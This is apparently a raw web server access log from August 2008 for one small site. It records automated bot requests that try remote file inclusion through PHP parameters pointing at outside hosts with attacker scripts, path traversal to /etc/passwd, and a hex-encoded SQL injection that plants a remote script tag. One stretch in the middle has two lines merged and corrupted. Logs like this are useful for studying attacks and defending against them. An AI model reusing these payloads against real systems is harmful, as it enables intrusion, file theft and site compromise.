69.94.30.30 - - [17/Aug/2008:18:23:52 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:18:25:15 -0700] "GET /logs/access_071217.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:18:25:50 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:18:25:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:26:10 -0700] "GET /logs/access_080121.log//data/compatible.php?module_name=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:26:10 -0700] "GET //data/compatible.php?module_name=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:26:10 -0700] "GET /logs//data/compatible.php?module_name=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:18:26:28 -0700] "GET /logs/access_071217.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
76.91.239.253 - - [17/Aug/2008:18:29:22 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
76.91.239.253 - - [17/Aug/2008:18:29:23 -0700] "GET /favicon.gif HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
70.84.182.98 - - [17/Aug/2008:18:31:14 -0700] "GET ///vwar/backup/errors.php?error=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
70.84.182.98 - - [17/Aug/2008:18:31:18 -0700] "GET /logs///vwar/backup/errors.php?error=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
219.94.128.213 - - [17/Aug/2008:18:31:44 -0700] "GET /logs/access_071217.log/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.86.201.170 - - [17/Aug/2008:18:32:43 -0700] "GET /logs/access_070709.log HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
121.206.112.164 - - [17/Aug/2008:18:32:53 -0700] "GET /logs/access_070709.log HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:18:33:38 -0700] "GET /logs/access_080210.log/index.php5?lang=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:18:33:49 -0700] "GET /index.php5?lang=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:18:34:01 -0700] "GET /logs/index.php5?lang=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:18:34:57 -0700] "GET /logs/access_080211.log/test.php?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:18:34:57 -0700] "GET /test.php?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:18:34:57 -0700] "GET /logs/test.php?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
190.47.109.27 - - [17/Aug/2008:18:37:45 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
190.47.109.27 - - [17/Aug/2008:18:37:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:18:40:57 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:18:40:57 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:18:41:21 -0700] "GET /logs/access_071015.log/test.php?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
88.80.205.116 - - [17/Aug/2008:18:41:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:18:41:50 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:18:41:51 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:18:42:35 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:18:42:35 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:18:48:17 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:18:48:20 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
70.88.226.121 - - [17/Aug/2008:18:51:01 -0700] "GET /logs/access_071111.log//admin.php?include_path=http://inegol.uludag.edu.tr/index/forum/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [17/Aug/2008:18:51:01 -0700] "GET //admin.php?include_path=http://inegol.uludag.edu.tr/index/forum/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [17/Aug/2008:18:51:01 -0700] "GET /logs//admin.php?include_path=http://inegol.uludag.edu.tr/index/forum/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [17/Aug/2008:18:51:14 -0700] "GET /logs/access_071217.log//admin.php?include_path=http://inegol.uludag.edu.tr/index/forum/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:54:46 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:54:46 -0700] "GET /logs/access_071015.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:54:46 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:18:55:18 -0700] "GET /test.php?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:58:28 -0700] "GET /logs/access_071015.log%20//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:19:02:30 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:19:02:44 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:19:04:20 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:05:15 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:05:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:05:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:08:05 -0700] "GET /logs/access_071203.log//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:08:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:08:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:09:10 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:09:21 -0700] "GET /logs/access_071217.log/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:09:21 -0700] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:09:40 -0700] "GET /logs/access_071217.log/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:09:40 -0700] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:09:40 -0700] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:19:09:44 -0700] "GET /logs/access_080310.log//booth.php?include_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:19:09:44 -0700] "GET /logs//booth.php?include_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:09:47 -0700] "GET /logs/access_071231.log/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:10:05 -0700] "GET /logs/access_071231.log/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.139.67.90 - - [17/Aug/2008:19:10:23 -0700] "GET /logs/access_080331.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
216.139.67.90 - - [17/Aug/2008:19:10:23 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
216.139.67.90 - - [17/Aug/2008:19:10:23 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:10:36 -0700] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:10:36 -0700] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:10:37 -0700] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.148.101.224 - - [17/Aug/2008:19:10:37 -0700] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:19:10:39 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
216.139.67.90 - - [17/Aug/2008:19:10:49 -0700] "GET /logs/access_080204.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:19:10:52 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:19:11:43 -0700] "GET /logs/access_080310.log//booth.php?include_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
85.252.40.100 - - [17/Aug/2008:19:11:43 -0700] "GET /logs//booth.php?include_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
219.159.104.76 - - [17/Aug/2008:19:13:07 -0700] "GET /logs/access_080623.log//?mosConfig_admin_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:22 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:22 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:13:28 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:41 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:41 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:41 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:41 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:13:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:14:06 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:14:06 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:14:15 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:19:14:15 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
24.228.64.78 - - [17/Aug/2008:19:16:00 -0700] "GET /logs/access_070827.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432pherlure/us1:65.95.12.1324.228.64.78 - - [17/Aug/2008:19:16:00 -0700] "GET /logs/access_070827.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043socalcustoms/us2:69.230.88.191.62.117 - - [17/Aug/2008:19:16:54 -0700] "GET /logs/access_080427.log/index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.191.62.117 - - [17/Aug/2008:19:16:55 -0700] "GET /index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.191.62.117 - - [17/Aug/2008:19:16:55 -0700] "GET /logs/index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.191.62.117 - - [17/Aug/2008:19:16:56 -0700] "GET /logs/access_071224.log/index.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.68.51.152 - - [17/Aug/2008:19:17:22 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.150.189.10 - - [17/Aug/2008:19:17:53 -0700] "GET //index.php3?act=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
216.127.84.31 - - [17/Aug/2008:19:18:02 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.127.84.31 - - [17/Aug/2008:19:18:02 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.127.84.31 - - [17/Aug/2008:19:18:02 -0700] "GET /logs/access_071217.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
